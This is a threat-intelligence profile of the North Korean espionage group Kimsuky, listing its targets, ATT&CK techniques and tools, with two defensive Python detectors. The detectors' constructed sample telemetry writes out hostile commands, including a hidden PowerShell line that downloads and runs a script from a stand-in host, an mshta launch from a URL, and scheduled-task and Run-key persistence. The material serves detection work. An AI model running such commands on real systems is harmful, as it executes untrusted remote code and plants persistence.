Kimsuky
Also known as: Black Banshee · Velvet Chollima · Emerald Sleet · THALLIUM · APT43 · TA427 · Springtail · Earth Kumiho · PatheticSlug
Overview
Kimsuky is a Democratic People's Republic of Korea (DPRK)-based cyber espionage group that has been active since at least 2012. The group initially targeted South Korean government agencies, think tanks, and subject-matter experts in various fields. Its operations expanded to include the United Nations and organizations in the government, education, business services, and manufacturing sectors across the United States, Japan, Russia, and Europe. Kimsuky has focused collection on foreign policy and national security issues tied to the Korean Peninsula, nuclear policy, and sanctions.

Kimsuky operations have overlapped with those of other North Korean state-sponsored cyber espionage actors as a result of ad hoc collaborations or other limited resource sharing. Kimsuky was assessed to be responsible for the 2014 Korea Hydro & Nuclear Power Co. compromise; other notable campaigns include Operation STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen (2019). In 2023, Kimsuky was observed using commercial large language models (LLMs) to assist with vulnerability research, scripting, social engineering and reconnaissance.

DPRK threat actor cluster boundaries overlap in open source reporting, with some security researchers consolidating all attributed North Korean state-sponsored cyber activity under Lazarus Group rather than tracking operationally distinct subgroups.
Targets
Defense · Diplomacy · Education · Energy · Government · Media · Private sector · Research - Innovation
Regions and named targets
Germany · South Korea (Korea Institute for Defense Analyses · Ministry of Unification · Sejong Institute)
Capabilities
- Exploitation of public-facing / client applications — ATT&CK T1190
- Custom malware/implant development — ATT&CK: 13 attributed custom malware families
TTPs — 130 techniques across 15 tactics
Reconnaissance
- T1589.002 Email Addresses
- T1589.003 Employee Names
- T1591 Gather Victim Org Information
- T1593.001 Social Media
- T1593.002 Search Engines
- T1594 Search Victim-Owned Websites
- T1596 Search Open Technical Databases
- T1598 Phishing for Information
- T1598.003 Spearphishing Link
- T1682 Query Public AI Services
Resource Development
- T1583 Acquire Infrastructure
- T1583.001 Domains
- T1583.004 Server
- T1583.006 Web Services
- T1584.001 Domains
- T1585 Establish Accounts
- T1585.001 Social Media Accounts
- T1585.002 Email Accounts
- T1586.002 Email Accounts
- T1587 Develop Capabilities
- T1587.001 Malware
- T1588.002 Tool
- T1588.003 Code Signing Certificates
- T1588.005 Exploits
- T1608.001 Upload Malware
Initial Access
- T1190 Exploit Public-Facing Application
- T1566 Phishing
- T1566.001 Spearphishing Attachment
- T1566.002 Spearphishing Link
Execution
- T1053.005 Scheduled Task
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1059.005 Visual Basic
- T1059.006 Python
- T1059.007 JavaScript
- T1106 Native API
- T1204.001 Malicious Link
- T1204.002 Malicious File
- T1204.004 Malicious Copy and Paste
- T1559.001 Component Object Model
Persistence
- T1098.007 Additional Local or Domain Groups
- T1133 External Remote Services
- T1136.001 Local Account
- T1176.001 Browser Extensions
- T1505.003 Web Shell
- T1543.003 Windows Service
- T1547.001 Registry Run Keys / Startup Folder
Privilege Escalation
- T1546.001 Change Default File Association
Stealth
- T1027 Obfuscated Files or Information
- T1027.001 Binary Padding
- T1027.002 Software Packing
- T1027.007 Dynamic API Resolution
- T1027.010 Command Obfuscation
- T1027.012 LNK Icon Smuggling
- T1027.013 Encrypted/Encoded File
- T1027.015 Compression
- T1027.016 Junk Code Insertion
- T1036.004 Masquerade Task or Service
- T1036.005 Match Legitimate Resource Name or Location
- T1036.007 Double File Extension
- T1055 Process Injection
- T1055.001 Dynamic-link Library Injection
- T1055.012 Process Hollowing
- T1070.004 File Deletion
- T1070.006 Timestomp
- T1078.003 Local Accounts
- T1140 Deobfuscate/Decode Files or Information
- T1205 Traffic Signaling
- T1218.005 Mshta
- T1218.010 Regsvr32
- T1218.011 Rundll32
- T1480.002 Mutual Exclusion
- T1497.001 System Checks
- T1564.002 Hidden Users
- T1564.003 Hidden Window
- T1564.011 Ignore Process Interrupts
- T1620 Reflective Code Loading
- T1678 Delay Execution
- T1684.001 Impersonation
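The Stealth entries T1036.007 (Double File Extension) and T1027.012 (LNK Icon Smuggling) both rely on a filename that reads as a document while the payload is executable. The checker below is an added example for this profile, not code from threatfilter.dev or from any vendor report on the group: it flags double extensions, bare executables posing as attachments, bidirectional-override characters that reverse the displayed extension, and space-padded names that push the real extension out of view. The extension lists and every sample filename are constructed assumptions.

```python
"""Attachment-name checks for the masquerade techniques in the Stealth list:
double extensions (T1036.007), LNK files that pose as documents (the name half
of T1027.012 icon smuggling), and bidirectional-override characters.
Added example for this profile; not code from threatfilter.dev or from any
vendor report, and every sample name below is constructed."""
import re
import unicodedata

# File types that execute on double-click under Windows (assumed list).
EXECUTABLE_EXTS = {"exe", "scr", "lnk", "hta", "js", "jse", "vbs", "vbe", "wsf",
                   "cmd", "bat", "ps1", "msi", "com", "pif", "cpl", "chm"}
# File types a recipient reads as passive documents. HWP (Hangul Word
# Processor) is included because of the group's South Korean targeting.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "hwp", "hwpx", "xls", "xlsx", "ppt",
                 "pptx", "txt", "rtf", "jpg", "png"}
# Unicode controls that reorder or isolate text so "report\u202efdp.exe"
# displays as "reportexe.pdf".
BIDI_CONTROLS = {"\u202a", "\u202b", "\u202d", "\u202e", "\u2066", "\u2067", "\u2068"}
PADDED_EXT_RE = re.compile(r"\s{5,}\.[a-z0-9]{2,4}$")


def classify_attachment(name: str) -> list[str]:
    """Return the masquerade indicators found in one filename (empty = clean)."""
    reasons = []
    if any(ch in BIDI_CONTROLS for ch in name):
        reasons.append("bidi-override")
    base = unicodedata.normalize("NFKC", name).lower()
    # Split on dots and strip spacing so "Agenda.docx      .exe" becomes
    # ["agenda", "docx", "exe"]; a leading dot (hidden file) yields no part.
    parts = [p.strip() for p in base.split(".") if p.strip()]
    if len(parts) >= 2:
        final, inner = parts[-1], parts[1:-1]
        if final in EXECUTABLE_EXTS:
            if any(p in DOCUMENT_EXTS for p in inner):
                reasons.append(f"double-extension:{final}")
            else:
                reasons.append(f"executable:{final}")
        # Long runs of spaces push the real extension out of the visible
        # column in Explorer and mail clients.
        if PADDED_EXT_RE.search(base):
            reasons.append("padded-extension")
    return reasons


def scan_attachments(names: list[str]) -> dict[str, list[str]]:
    """Map each suspicious name to its indicators; clean names are omitted."""
    return {n: r for n in names if (r := classify_attachment(n))}


# Constructed sample attachment names (not from a real campaign).
SAMPLE_NAMES = [
    "KIDA_seminar_agenda.pdf",
    "Seminar_invitation.pdf.lnk",
    "report\u202efdp.exe",
    "Agenda.docx" + " " * 40 + ".exe",
    "questionnaire.hwp",
    "Unification_policy_2024.doc.scr",
]

if __name__ == "__main__":
    for name, why in scan_attachments(SAMPLE_NAMES).items():
        print(f"{name!r}: {', '.join(why)}")
```

The name check is deliberately independent of the icon check: a `.lnk` whose icon resource points at a PDF viewer still shows up here because its final extension executes, so the two indicators corroborate rather than duplicate each other.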
Defense Impairment
- T1112 Modify Registry
- T1553.002 Code Signing
- T1685 Disable or Modify Tools
- T1686 Disable or Modify System Firewall
Credential Access
- T1003.001 LSASS Memory
- T1040 Network Sniffing
- T1111 Multi-Factor Authentication Interception
- T1539 Steal Web Session Cookie
- T1552.001 Credentials In Files
- T1552.004 Private Keys
- T1555.003 Credentials from Web Browsers
- T1557 Adversary-in-the-Middle
Discovery
- T1007 System Service Discovery
- T1012 Query Registry
- T1016 System Network Configuration Discovery
- T1033 System Owner/User Discovery
- T1057 Process Discovery
- T1082 System Information Discovery
- T1083 File and Directory Discovery
- T1124 System Time Discovery
- T1217 Browser Information Discovery
- T1518.001 Security Software Discovery
- T1680 Local Storage Discovery
Lateral Movement
- T1021.001 Remote Desktop Protocol
- T1534 Internal Spearphishing
- T1550.002 Pass the Hash
Collection
- T1005 Data from Local System
- T1056.001 Keylogging
- T1056.003 Web Portal Capture
- T1074.001 Local Data Staging
- T1113 Screen Capture
- T1114.002 Remote Email Collection
- T1114.003 Email Forwarding Rule
- T1115 Clipboard Data
- T1185 Browser Session Hijacking
- T1560.001 Archive via Utility
- T1560.003 Archive via Custom Method
Command and Control
- T1071.001 Web Protocols
- T1071.002 File Transfer Protocols
- T1071.003 Mail Protocols
- T1102.001 Dead Drop Resolver
- T1102.002 Bidirectional Communication
- T1105 Ingress Tool Transfer
- T1132.002 Non-Standard Encoding
- T1219.002 Remote Desktop Software
- T1568 Dynamic Resolution
Exfiltration
- T1020 Automated Exfiltration
- T1041 Exfiltration Over C2 Channel
- T1567.002 Exfiltration to Cloud Storage
Impact
- T1489 Service Stop
- T1657 Financial Theft
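The Execution, Persistence and Stealth lists above are mostly host-side techniques that leave process-creation records: Mshta/Regsvr32/Rundll32 (T1218.005/.010/.011), hidden and encoded PowerShell (T1564.003, T1027.010), pasted commands (T1204.004), certutil as a downloader or decoder (T1105, T1140), and scheduled-task or Run-key persistence (T1053.005, T1547.001). The hunt below is an added example for this profile, not code from threatfilter.dev or from any Kimsuky report: it scores Sysmon Event ID 1 style events per technique and then flags hosts where persistence follows an execution hit within a short window, which is the chain that separates a foothold from isolated noise. The field names, the parent-process list, the ClickFix heuristic, and every host, path and URL in the sample telemetry are constructed assumptions.

```python
"""Hunt over process-creation telemetry (Sysmon Event ID 1 style) for the
execution, LOLBin, persistence and download techniques in the TTP list above,
then correlate execution followed by persistence on one host.
Added example for this profile; not code from threatfilter.dev or from any
Kimsuky report, and every event, hostname and URL below is constructed."""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass
class ProcEvent:
    ts: str        # ISO-8601 timestamp
    host: str
    parent: str    # full path of the parent image
    image: str     # full path of the new process
    cmdline: str


# Parents from which a LOLBin launch is rarely legitimate (assumed list):
# document viewers, mail, script hosts, and the shell (Run dialog, pasted commands).
SUSPECT_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "hwp.exe",
                   "outlook.exe", "wscript.exe", "cscript.exe", "explorer.exe"}
LOLBINS = {"mshta.exe": "T1218.005", "regsvr32.exe": "T1218.010",
           "rundll32.exe": "T1218.011"}
PERSISTENCE = {"T1053.005", "T1547.001"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.I)
RUN_KEY_RE = re.compile(r"currentversion\\run", re.I)
ENCODED_RE = re.compile(r"\s-(e|ec|enc|encodedcommand)\s")
HIDDEN_RE = re.compile(r"-w(indowstyle)?\s+hidden")


def _exe(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: ProcEvent) -> list[tuple[str, str]]:
    """Return (ATT&CK technique, reason) pairs matched by a single event."""
    img, parent, low = _exe(ev.image), _exe(ev.parent), ev.cmdline.lower()
    hits = []
    if img in LOLBINS and (URL_RE.search(ev.cmdline) or parent in SUSPECT_PARENTS):
        hits.append((LOLBINS[img], f"{img} spawned by {parent} or given a URL"))
    if img in ("powershell.exe", "pwsh.exe"):
        if ENCODED_RE.search(low):
            hits.append(("T1027.010", "encoded PowerShell command"))
        if HIDDEN_RE.search(low):
            hits.append(("T1564.003", "hidden window"))
        if any(k in low for k in ("downloadstring", "invoke-webrequest", "iwr ")):
            hits.append(("T1105", "PowerShell download cradle"))
        if parent == "explorer.exe" and URL_RE.search(ev.cmdline):
            # Heuristic for copy-and-paste lures: the user pastes a command
            # carrying a URL into the Run dialog or a terminal opened from the shell.
            hits.append(("T1204.004", "shell-launched PowerShell fetching a URL"))
    if img == "schtasks.exe" and "/create" in low:
        hits.append(("T1053.005", "scheduled task created"))
    if img == "reg.exe" and " add " in low and RUN_KEY_RE.search(low):
        hits.append(("T1547.001", "Run key written"))
    if img == "certutil.exe" and ("-urlcache" in low or "-decode" in low):
        hits.append(("T1140" if "-decode" in low else "T1105", "certutil abuse"))
    return hits


def hunt(events: list[ProcEvent], window_min: int = 10):
    """Return (findings, hosts): findings are (host, ts, technique, reason) tuples,
    hosts are those where persistence was set up within window_min minutes of an
    earlier execution hit on the same machine."""
    findings, first_exec, chained = [], {}, set()
    for ev in sorted(events, key=lambda e: e.ts):
        t = datetime.fromisoformat(ev.ts)
        for tech, why in check_event(ev):
            findings.append((ev.host, ev.ts, tech, why))
            if tech in PERSISTENCE:
                t0 = first_exec.get(ev.host)
                if t0 is not None and t - t0 <= timedelta(minutes=window_min):
                    chained.add(ev.host)
            else:
                first_exec.setdefault(ev.host, t)
    return findings, chained


# Constructed sample telemetry; hosts, paths and URLs are not real.
SAMPLE_EVENTS = [
    ProcEvent("2024-03-04T09:12:01", "WS-ANALYST-01",
              r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://doc-view.example.invalid/agenda.hta"),
    ProcEvent("2024-03-04T09:12:04", "WS-ANALYST-01",
              r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -enc SQBFAFgAIAAoAE4A"),
    ProcEvent("2024-03-04T09:12:09", "WS-ANALYST-01",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 15 /tn "OneDriveUpd" /tr "wscript.exe C:\Users\Public\up.vbs"'),
    ProcEvent("2024-03-04T09:15:30", "WS-ANALYST-01",
              r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe",
              r"reg.exe add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /t REG_SZ /d C:\Users\Public\up.vbs"),
    ProcEvent("2024-03-04T10:01:00", "WS-FIN-02",
              r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c dir"),
    ProcEvent("2024-03-04T10:02:00", "WS-FIN-02",
              r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\rundll32.exe",
              "rundll32.exe shell32.dll,Control_RunDLL"),
    ProcEvent("2024-03-04T11:20:45", "WS-PR-03",
              r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "iwr https://verify.example.invalid/x.ps1 | iex"'),
]

if __name__ == "__main__":
    found, hosts = hunt(SAMPLE_EVENTS)
    for f in found:
        print(f)
    print("execution followed by persistence on:", sorted(hosts))
```

On the constructed data the Word-to-mshta-to-PowerShell-to-schtasks chain on WS-ANALYST-01 is the only host that trips the correlation; WS-PR-03 shows a shell-launched download cradle (the copy-and-paste pattern) but no persistence yet, and the benign rundll32 call on WS-FIN-02 is not flagged because it has neither a URL nor a suspect parent. In production the per-technique rules should be tuned against the environment's own parent-child baseline before the chain logic is trusted.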
Tools & malware (19)
Troll Stealer · HTTPTroy · schtasks · certutil · Amadey · GoBear · Brave Prince · CSPY Downloader · gh0st RAT · AppleSeed · Gomir · NOKKI · QuasarRAT · Gold Dragon · PsExec · KGH_SPY · Mimikatz · BabyShark · TRANSLATEXT
Reporting (3)
- 2026 GLOBAL THREAT LANDSCAPE REPORT: Decoding the Accelerated Cyber Attack Cycle — Rapid7
- Introducing the 2026 Cloudflare Threat Report — Cloudflare
- Springtail: New Linux Backdoor Added to Toolkit — Symantec Threat Hunter Team